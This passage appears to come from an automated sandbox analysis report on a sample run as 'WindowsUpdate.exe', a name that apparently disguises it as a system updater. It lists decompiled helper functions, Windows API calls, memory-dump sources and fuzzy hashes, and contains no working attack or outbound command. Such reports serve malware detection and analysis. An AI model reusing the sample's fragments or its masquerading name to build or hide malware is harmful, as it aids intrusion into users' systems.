					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t31 + 0xc)) = _t22;
				L004115D0();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				 *((intOrPtr*)(_t31 + 0x10)) = _t22;
				return _t31;
			}

0x004084ce
0x004084d6
0x004084dc
0x004084e1
0x004084e3
0x004084f3
0x00408505
0x004084f5
0x004084f5
0x004084f8
0x004084fa
0x004084fd
0x00408500
0x00408500
0x00408507
0x00408509
0x0040850c
0x00408514
0x00408526
0x00408516
0x00408516
0x00408519
0x0040851b
0x0040851e
0x00408521
0x00408521
0x00408528
0x0040852a
0x0040852d
0x00408535
0x00408547
0x00408537
0x00408537
0x0040853a
0x0040853c
0x0040853f
0x00408542
0x00408542
0x00408549
0x0040854b
0x0040854e
0x00408556
0x00408568
0x00408558
0x00408558
0x0040855b
0x0040855d
0x00408560
0x00408563
0x00408563
0x0040856b
0x00408571

APIs

Part of subcall function 00406549: memset.MSVCRT ref: 00406557

??2@YAPAXI@Z.MSVCRT ref: 004084E3
??2@YAPAXI@Z.MSVCRT ref: 0040850C
??2@YAPAXI@Z.MSVCRT ref: 0040852D
??2@YAPAXI@Z.MSVCRT ref: 0040854E

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ??2@$memset
String ID:
API String ID: 1860491036-0
Opcode ID: 95721ad3e56739601f71688443cad15957724b47e5dc3dc32a69c890d8a4f10a
Instruction ID: 33d46294e57da76ea2c08804649fae6184d1477937e8cd9eb119e1572679ad16
Opcode Fuzzy Hash: 95721ad3e56739601f71688443cad15957724b47e5dc3dc32a69c890d8a4f10a
Instruction Fuzzy Hash: F321B3B0A01300AED7518F2B9945955FBE4FF94355B2AC8AFD149DB2B2EBB8C8408F14

Uniqueness

Uniqueness Score: -1.00%

Function 00406A74, Relevance: 5.1, APIs: 4, Instructions: 63
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406A74(signed int* __eax, void* __ecx, char* _a4) {
				int _v8;
				void* __edi;
				int _t27;
				intOrPtr _t28;
				intOrPtr _t31;
				intOrPtr _t42;
				intOrPtr _t52;
				void** _t55;
				void** _t56;
				signed int* _t59;

				_t59 = __eax;
				_t27 = strlen(_a4);
				_t42 =  *((intOrPtr*)(_t59 + 4));
				_t52 = _t42 + _t27 + 1;
				_v8 = _t27;
				_t28 =  *((intOrPtr*)(_t59 + 0x14));
				 *((intOrPtr*)(_t59 + 4)) = _t52;
				_t55 = _t59 + 0x10;
				if(_t52 != 0xffffffff) {
					E004060FA(_t59, _t52, _t55, 1, _t28);
				} else {
					free( *_t55);
				}
				_t53 =  *(_t59 + 0x1c);
				_t31 =  *((intOrPtr*)(_t59 + 0x18));
				_t56 = _t59 + 0xc;
				if( *(_t59 + 0x1c) != 0xffffffff) {
					E004060FA(_t59 + 8, _t53, _t56, 4, _t31);
				} else {
					free( *_t56);
				}
				memcpy( *(_t59 + 0x10) + _t42, _a4, _v8);
				 *((char*)( *(_t59 + 0x10) + _t42 + _v8)) = 0;
				 *((intOrPtr*)( *_t56 +  *(_t59 + 0x1c) * 4)) = _t42;
				 *(_t59 + 0x1c) =  *(_t59 + 0x1c) + 1;
				_t25 =  *(_t59 + 0x1c) - 1; // -1
				return _t25;
			}

0x00406a7e
0x00406a80
0x00406a85
0x00406a88
0x00406a8f
0x00406a92
0x00406a96
0x00406a99
0x00406a9c
0x00406aac
0x00406a9e
0x00406aa0
0x00406aa0
0x00406ab2
0x00406ab8
0x00406abc
0x00406abf
0x00406ad0
0x00406ac1
0x00406ac3
0x00406ac3
0x00406ae3
0x00406af0
0x00406afc
0x00406aff
0x00406b06
0x00406b0c

APIs

strlen.MSVCRT ref: 00406A80
free.MSVCRT(?,00000001,?,00000000,?,?,00406DCF,?,00000000,?,?), ref: 00406AA0

Part of subcall function 004060FA: malloc.MSVCRT ref: 00406116
Part of subcall function 004060FA: memcpy.MSVCRT ref: 0040612E
Part of subcall function 004060FA: free.MSVCRT(00000000,00000000,Mt,00406B49,00000001,?,00000000,Mt,00406D88,00000000,?,?), ref: 00406137

free.MSVCRT(?,00000001,?,00000000,?,?,00406DCF,?,00000000,?,?), ref: 00406AC3
memcpy.MSVCRT ref: 00406AE3

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: free$memcpy$mallocstrlen
String ID:
API String ID: 3669619086-0
Opcode ID: 5eb856daf9b2f55e9999836f5936cf74f251c15999897e978b7d5133cb55aa44
Instruction ID: e46d755c35f7a0493bef025674ad9543d325b8c94dab604409744cdcda2aebf9
Opcode Fuzzy Hash: 5eb856daf9b2f55e9999836f5936cf74f251c15999897e978b7d5133cb55aa44
Instruction Fuzzy Hash: 70116D71200700EFC730EF18D8819AAB7F5EF45328B108A2EF957A7691DB35F9658B54

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: WindowsUpdate.exe PID: 6976 Parent PID: 3352 WindowsUpdate.exeCOMMON

Executed Functions

Function 00FBA570, Relevance: 1.7, APIs: 1, Instructions: 193COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00FBA7B6

Memory Dump Source

Source File: 0000000F.00000002.355241940.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b9f87a0b4b00fa965ece76cb5ff0229f48ebb838a5ca635632f234dc58a21e56
Instruction ID: 4294e31ea10489db2cbd0943decd4b920f9171daec5babb68965288b3394b1fb
Opcode Fuzzy Hash: b9f87a0b4b00fa965ece76cb5ff0229f48ebb838a5ca635632f234dc58a21e56
Instruction Fuzzy Hash: E57145B0A00B058FDB24DF6AD44579ABBF5FF88314F04892ED48AD7A50DB75E8058F92

Uniqueness

Uniqueness Score: -1.00%

Function 00FB3F44, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00FB5829

Memory Dump Source

Source File: 0000000F.00000002.355241940.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 23826623212b688bda14e26c55e830f5f005483a61e635929f9fd08aac078e38
Instruction ID: 5eb72c2363fa844629e9e210be2a341fe1e2c03bc9b02b268580e89e633b0dd8
Opcode Fuzzy Hash: 23826623212b688bda14e26c55e830f5f005483a61e635929f9fd08aac078e38
Instruction Fuzzy Hash: C741E3B1C00B19CBDB24DFAAC884BDEBBB5BF49704F20846AD409AB251DBB55945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00FB576C, Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00FB5829

Memory Dump Source

Source File: 0000000F.00000002.355241940.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 145509b451ca65a749d880ed2acc5120716929852ad867ee70b1f17cef268064
Instruction ID: 4f1ed3f2b4dba44569a3475845eaccd77480c2dec90a6483e67c324a2a82b9fe
Opcode Fuzzy Hash: 145509b451ca65a749d880ed2acc5120716929852ad867ee70b1f17cef268064
Instruction Fuzzy Hash: 4341C4B1C00719CFDB24CFA9C884BDEBBB5BF89704F14846AD409AB251D7B55946CF90

Uniqueness

Uniqueness Score: -1.00%

Function 050D3D70, Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 050D3E31

Memory Dump Source

Source File: 0000000F.00000002.362690714.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 540d2673f521b95b5e90ef9379f85d909b65257b0e202202888cc9fe696a6b5c
Instruction ID: 51bff3a32270818ef0ec374804569cfc23c559a949f5bfddbf7a8c7d1f8db80d
Opcode Fuzzy Hash: 540d2673f521b95b5e90ef9379f85d909b65257b0e202202888cc9fe696a6b5c
Instruction Fuzzy Hash: AA4125B99007058FCB14CF99D488AAEFBF5FB88314F248859E519AB361D774A841CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FBB294, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00FBCA5E,?,?,?,?,?), ref: 00FBCB1F

Memory Dump Source

Source File: 0000000F.00000002.355241940.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d06a42727ccdb5e30455108e81bab8e4ac2daf731a62a25da5380bd378dba934
Instruction ID: e9a202e6b2bcb041d3331260a2c86b2f9dde1b74a28c061f5a3907aeef6db49c
Opcode Fuzzy Hash: d06a42727ccdb5e30455108e81bab8e4ac2daf731a62a25da5380bd378dba934
Instruction Fuzzy Hash: B121E6B5D00249DFDB10CFAAD485AEEBBF8EB48324F14841AE914B7350D374A944DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FBCA91, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00FBCA5E,?,?,?,?,?), ref: 00FBCB1F

Memory Dump Source

Source File: 0000000F.00000002.355241940.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 176f0c563718ab832e5c39b91c73dd4e0a793a6e8c7cac06baeaa493b94cf868
Instruction ID: 4beafb996bcc835eadf870d988722035f653b5d2adc59fa92fe07b26ff21f137
Opcode Fuzzy Hash: 176f0c563718ab832e5c39b91c73dd4e0a793a6e8c7cac06baeaa493b94cf868
Instruction Fuzzy Hash: 5121E3B6D00209DFDB00CFA9D585AEEBBF4EB48324F14841AE914B7350D378A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FB98E0, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00FBA831,00000800,00000000,00000000), ref: 00FBAA42

Memory Dump Source

Source File: 0000000F.00000002.355241940.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7a35ea9a63936037fe58c7bb271ad3a3af54950104ec0aa829b8c972db6df331
Instruction ID: 2940015560051101bcd817a6565b9720ff74875028590d1d98aaa8e59a8fe03b
Opcode Fuzzy Hash: 7a35ea9a63936037fe58c7bb271ad3a3af54950104ec0aa829b8c972db6df331
Instruction Fuzzy Hash: B31103B6D00249DFCB10CF9AD444AEEFBF8EB88324F14842AE515B7600C379A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00FBA9D1, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00FBA831,00000800,00000000,00000000), ref: 00FBAA42

Memory Dump Source

Source File: 0000000F.00000002.355241940.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: fe7d05daa0cf96146df190b1468d0b88434b180973d2d00ca888afc85dcb718d
Instruction ID: 8ac21482c264eeafeddefce84db9c747bc6ad5d3cf1272ba47852fbeb64f2748
Opcode Fuzzy Hash: fe7d05daa0cf96146df190b1468d0b88434b180973d2d00ca888afc85dcb718d
Instruction Fuzzy Hash: FF1114B6D00349DFCB10CFAAD444ADEFBF8AB88324F14842AD515B7640C779A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00FBA750, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00FBA7B6

Memory Dump Source

Source File: 0000000F.00000002.355241940.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b1d1c6d1e821237b57cd763086c65996bc868be1a63fda7ef9f9f2458fb6681d
Instruction ID: 0aa8f19b92f72eb9fc1623473e0bf3c7367ae4b77e8f7acae7c2fc5d206c8bc2
Opcode Fuzzy Hash: b1d1c6d1e821237b57cd763086c65996bc868be1a63fda7ef9f9f2458fb6681d
Instruction Fuzzy Hash: 66110FB6C046498FDB10CF9AC444ADEFBF8AB88324F14842AD419B7600C378A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F0D3D8, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.354840483.0000000000F0D000.00000040.00000001.sdmp, Offset: 00F0D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db9a277f234c885c007e95ad22e38c6f9edbca7c7afb7e50d91ee7c901a453a6
Instruction ID: 498bb00f06c40c735ab42a1b528b2c4d11dc968b074128ab87ad4a4ffdf44209
Opcode Fuzzy Hash: db9a277f234c885c007e95ad22e38c6f9edbca7c7afb7e50d91ee7c901a453a6
Instruction Fuzzy Hash: 5D212876504204DFDB05CF94D9C4B66BB65FB98324F24C569E8090B286C336E846F7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00F0D4C4, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.354840483.0000000000F0D000.00000040.00000001.sdmp, Offset: 00F0D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 598b31834a7777f29ea452121371cde84d94271b8910c3cb6c063a15f1b1f684
Instruction ID: 89b061440e741699c924ebe715c8226093adb5223d70d899d995efa1e35159f1
Opcode Fuzzy Hash: 598b31834a7777f29ea452121371cde84d94271b8910c3cb6c063a15f1b1f684
Instruction Fuzzy Hash: 43210676504240DFCB05DF94D9C4B66BB65FB98328F288569EC051B286C336D846F6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00F1D1D4, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.354910194.0000000000F1D000.00000040.00000001.sdmp, Offset: 00F1D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e6f2fb46eff9b30adbe8998720711e8884107e9d864c74fc1f287826c2f7689
Instruction ID: 09159a50ce89cbc4be0505b2a0cf71bb341fc1620aa4b0bbfa6f214e38ed6e65
Opcode Fuzzy Hash: 3e6f2fb46eff9b30adbe8998720711e8884107e9d864c74fc1f287826c2f7689
Instruction Fuzzy Hash: 2F210771904284EFDB05CF54D9C4BA6BBB5FB84324F24CA6DD8094B646C336D886EA61

Uniqueness

Uniqueness Score: -1.00%

Function 00F1D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.354910194.0000000000F1D000.00000040.00000001.sdmp, Offset: 00F1D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d1f73f016a98e5e5f2ed1acb6dbff7764e5ca361048c6941f92bb5ba387db6c
Instruction ID: 209091ddbb13a082cfb756e0c128669c1f83de0399636803a7948d086e4a0a66
Opcode Fuzzy Hash: 9d1f73f016a98e5e5f2ed1acb6dbff7764e5ca361048c6941f92bb5ba387db6c
Instruction Fuzzy Hash: 0C210776604240DFCB14CF64D9C4BA6BB75FB88324F24C96DD80A4B24AC336D887EA61

Uniqueness

Uniqueness Score: -1.00%

Function 00F1D005, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.354910194.0000000000F1D000.00000040.00000001.sdmp, Offset: 00F1D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62897aaab3565e921827ba52185a33e1076898e8674c1667267ef1c5fd3a1911
Instruction ID: 64fe6118c68cc5898b71fab75bcb9b3b5a5aa40707f49cd2fa1190f4b1f78360
Opcode Fuzzy Hash: 62897aaab3565e921827ba52185a33e1076898e8674c1667267ef1c5fd3a1911
Instruction Fuzzy Hash: B42192755093C08FCB02CF24D990755BF71EB46324F28C5EAD8498F697C33A984ADB62

Uniqueness

Uniqueness Score: -1.00%

Function 00F0D4BF, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.354840483.0000000000F0D000.00000040.00000001.sdmp, Offset: 00F0D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc9a01fde164ed1e7956aced2f3de09a2e23f2b6d2d198ccc532904340cf2df4
Instruction ID: bf0ae5c4f694c2cc0620c50f16b4cf4d17f6c8fe1ddde099d80684fba62b6caf
Opcode Fuzzy Hash: bc9a01fde164ed1e7956aced2f3de09a2e23f2b6d2d198ccc532904340cf2df4
Instruction Fuzzy Hash: E911AF76804280CFCB15CF54D9C4B26BF71FB98324F2886A9DC454B696C336D85AEBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F0D3D3, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.354840483.0000000000F0D000.00000040.00000001.sdmp, Offset: 00F0D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc9a01fde164ed1e7956aced2f3de09a2e23f2b6d2d198ccc532904340cf2df4
Instruction ID: 8e6f93b7d97091c0189d1ec8e2936495e629ff56b2f6e07446f828a79824cbdd
Opcode Fuzzy Hash: bc9a01fde164ed1e7956aced2f3de09a2e23f2b6d2d198ccc532904340cf2df4
Instruction Fuzzy Hash: EA11D376804280DFCF15CF54D5C4B16BF71FB94324F28C6A9D8094B656C33AE85AEBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F1D1CF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.354910194.0000000000F1D000.00000040.00000001.sdmp, Offset: 00F1D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdb46c6861fcf7f2b3faaf3f1670719688c0783f1dc8466a2cb6d5aa34317797
Instruction ID: 0777ecded79bcc6c2204639f4ec9ba9a70b5b842c537083ba4d4cc43ea08dfcf
Opcode Fuzzy Hash: cdb46c6861fcf7f2b3faaf3f1670719688c0783f1dc8466a2cb6d5aa34317797
Instruction Fuzzy Hash: B111DD75904280DFCB05CF10C9C0B55FBB1FB84324F28C6ADD8494B696C33AD88ADB61

Uniqueness

Uniqueness Score: -1.00%

Function 00F0D745, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.354840483.0000000000F0D000.00000040.00000001.sdmp, Offset: 00F0D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02a355ce296f5ab3910e1db0f4416755da731f4490c8403f00495ce301fa7ca2
Instruction ID: 98f445298dd2afba2feaa6fa76e32e0a54976d71843ed45ad87a7a0e0832d6dc
Opcode Fuzzy Hash: 02a355ce296f5ab3910e1db0f4416755da731f4490c8403f00495ce301fa7ca2
Instruction Fuzzy Hash: 9C01F7324083409AEB104EA5CCC4B67FB9CDF41338F18895EED041B6C6D3799844FAB1

Uniqueness

Uniqueness Score: -1.00%

Function 00F0D744, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.354840483.0000000000F0D000.00000040.00000001.sdmp, Offset: 00F0D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6bf41a5dafb60ee40a7ca9f81a36d1c05e3207c7d5dce174bfc4b184c26c55f
Instruction ID: 743ccfd7bdf295c50554a4d20d14634fb1320b1cd211784690bb42fba6c05354
Opcode Fuzzy Hash: a6bf41a5dafb60ee40a7ca9f81a36d1c05e3207c7d5dce174bfc4b184c26c55f
Instruction Fuzzy Hash: 9AF062714047849EEB148E56CC88B62FB98EB91734F18C45AED085F286D3799C44DAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: WindowsUpdate.exe PID: 7120 Parent PID: 6976 WindowsUpdate.exeCOMMON

Executed Functions

Function 01146BEB, Relevance: 6.1, APIs: 4, Instructions: 122threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 01146C58
GetCurrentThread.KERNEL32 ref: 01146C95
GetCurrentProcess.KERNEL32 ref: 01146CD2
GetCurrentThreadId.KERNEL32 ref: 01146D2B

Memory Dump Source

Source File: 00000010.00000002.358966277.0000000001140000.00000040.00000001.sdmp, Offset: 01140000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 3ef6d61855b9e0a8a33642b36eb87c4049a142521cfe437f94786549e8ee1557
Instruction ID: e6b8d05459572ef092c84d6b6f82bbcb0b5390b1c8f896cb24bf4ccbab610c50
Opcode Fuzzy Hash: 3ef6d61855b9e0a8a33642b36eb87c4049a142521cfe437f94786549e8ee1557
Instruction Fuzzy Hash: C75156B4D006498FDB28CFA9D548BDEBBF0EF89318F248959E419B7290DB345848CF65

Uniqueness

Uniqueness Score: -1.00%

Function 01146BF8, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 01146C58
GetCurrentThread.KERNEL32 ref: 01146C95
GetCurrentProcess.KERNEL32 ref: 01146CD2
GetCurrentThreadId.KERNEL32 ref: 01146D2B

Memory Dump Source

Source File: 00000010.00000002.358966277.0000000001140000.00000040.00000001.sdmp, Offset: 01140000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 5cf296704a9434a12adcd1cc01c3b024c5ea3cd2d80af2ab51b5a2480d6369e1
Instruction ID: bf0b978bc6e246a3adf3d60f78e42106c3455b66c87a622dce269a0766fedddc
Opcode Fuzzy Hash: 5cf296704a9434a12adcd1cc01c3b024c5ea3cd2d80af2ab51b5a2480d6369e1
Instruction Fuzzy Hash: 345145B4D006498FDB18CFA9D548BDEBBF4EF89308F248559E419B7290DB345848CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0114BC18, Relevance: 1.7, APIs: 1, Instructions: 199COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0114BE6E

Memory Dump Source

Source File: 00000010.00000002.358966277.0000000001140000.00000040.00000001.sdmp, Offset: 01140000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 20c2a194fe9054e8cd85e98149e9accf4191986919a58e1b90c97b85291656a2
Instruction ID: c9ccb02ab539619f5e0f1f85bd73d24ac30e57374fbba79f18e3babd813f7615
Opcode Fuzzy Hash: 20c2a194fe9054e8cd85e98149e9accf4191986919a58e1b90c97b85291656a2
Instruction Fuzzy Hash: F8714670A04B058FD728DF6AD48079ABBF5FF88604F00892ED58AD7A51DB35E809CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0114DCCD, Relevance: 1.6, APIs: 1, Instructions: 115COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0114DDEA

Memory Dump Source

Source File: 00000010.00000002.358966277.0000000001140000.00000040.00000001.sdmp, Offset: 01140000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: ecacdda364c44b18074b1283152d3d2a426de04c748c8eed8951c14acf8cad4a
Instruction ID: cba18516bf68123c2d54e013d28ce0d19956b545b95177b5cd474f411c88a128
Opcode Fuzzy Hash: ecacdda364c44b18074b1283152d3d2a426de04c748c8eed8951c14acf8cad4a
Instruction Fuzzy Hash: CF51DFB1C003199FDF14CFE9D884ADEBBB5BF98314F25852AE819AB250D7709985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0114DCD8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0114DDEA

Memory Dump Source

Source File: 00000010.00000002.358966277.0000000001140000.00000040.00000001.sdmp, Offset: 01140000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 8c1020bc540010eb6a9a07fc9ca8b53797df61cb6631267b3759412c97a4b8f2
Instruction ID: 8013a97228f1f5a9c218eb94541c609d56a35f3d5c1fe44013a9e80ccad724eb
Opcode Fuzzy Hash: 8c1020bc540010eb6a9a07fc9ca8b53797df61cb6631267b3759412c97a4b8f2
Instruction Fuzzy Hash: 1A41EEB1C00309DFDF14CF9AD884ADEBBB5BF98314F24812AE419AB250D7709885CF90

Uniqueness

Uniqueness Score: -1.00%

Function 051B0CD0, Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 051B0D91

Memory Dump Source

Source File: 00000010.00000002.360082076.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 491cdbe2e9696205a708e98e8863399cb69d8645ee91be7eb19482def87fb251
Instruction ID: f065da2adc3e63c40c94ff6454b34f839b0e3d8a6a839448520728437a0ef5c6
Opcode Fuzzy Hash: 491cdbe2e9696205a708e98e8863399cb69d8645ee91be7eb19482def87fb251
Instruction Fuzzy Hash: 564114B8A00205CFDB14CF99C488AABBBF5FF88314F258599D519AB361D774A841CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 051B4268, Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(00000004,?,00000000), ref: 051B430F

Memory Dump Source

Source File: 00000010.00000002.360082076.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: d97f1bedadc17b0ea401f90673194ed9819b2170853815c560d7ff2e21379a17
Instruction ID: 21a17e457a6ea1c73fbc42b23b41f11995fc8043a71611463f93a1ba7140f2df
Opcode Fuzzy Hash: d97f1bedadc17b0ea401f90673194ed9819b2170853815c560d7ff2e21379a17
Instruction Fuzzy Hash: F02116B1801209DFDB10CF9AD484BDEFBF5AF44314F19C46AE409A7651D3B4A945CF51

Uniqueness

Uniqueness Score: -1.00%

Function 051B3AE8, Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(00000004,?,00000000), ref: 051B430F

Memory Dump Source

Source File: 00000010.00000002.360082076.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 77c639c0de377a4e25f39cc07c4e468684d82c2be93181a44c6c7f0144b13b3a
Instruction ID: 393998098582920b96f4ee149e308befb3d0eb825c2c432cd74cd89ada751968
Opcode Fuzzy Hash: 77c639c0de377a4e25f39cc07c4e468684d82c2be93181a44c6c7f0144b13b3a
Instruction Fuzzy Hash: 593136B1801208DFDB10CFAAD484BDEFBF5AF44314F19C46AE409A7251D3B4A945CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01146E1B, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01146EA7

Memory Dump Source

Source File: 00000010.00000002.358966277.0000000001140000.00000040.00000001.sdmp, Offset: 01140000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d988d18a4b975f39a5c21a28f43ef56e3267b5a478ac4a9d9f4d880e32a933d2
Instruction ID: 0bacfa2330312a7ba26dd11e64da8ca4c8488db7413b885bb25f3b0202804874
Opcode Fuzzy Hash: d988d18a4b975f39a5c21a28f43ef56e3267b5a478ac4a9d9f4d880e32a933d2
Instruction Fuzzy Hash: 0421E3B59002199FDB10CFA9D884ADEBBF8EB48324F14841AE914B3350C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01146E20, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01146EA7

Memory Dump Source

Source File: 00000010.00000002.358966277.0000000001140000.00000040.00000001.sdmp, Offset: 01140000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a59afbb90503d9f88e6379c6a62bdb8de840a117292948e53286256e81ce59cd
Instruction ID: 13fc0286f58c2d9007b3f38411dd73f27439a43ded763d3d5c2999129195d4b9
Opcode Fuzzy Hash: a59afbb90503d9f88e6379c6a62bdb8de840a117292948e53286256e81ce59cd
Instruction Fuzzy Hash: FC21B0B59012199FDB10CFAAD984AEEBBF8EB48724F14841AE914B7250D374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

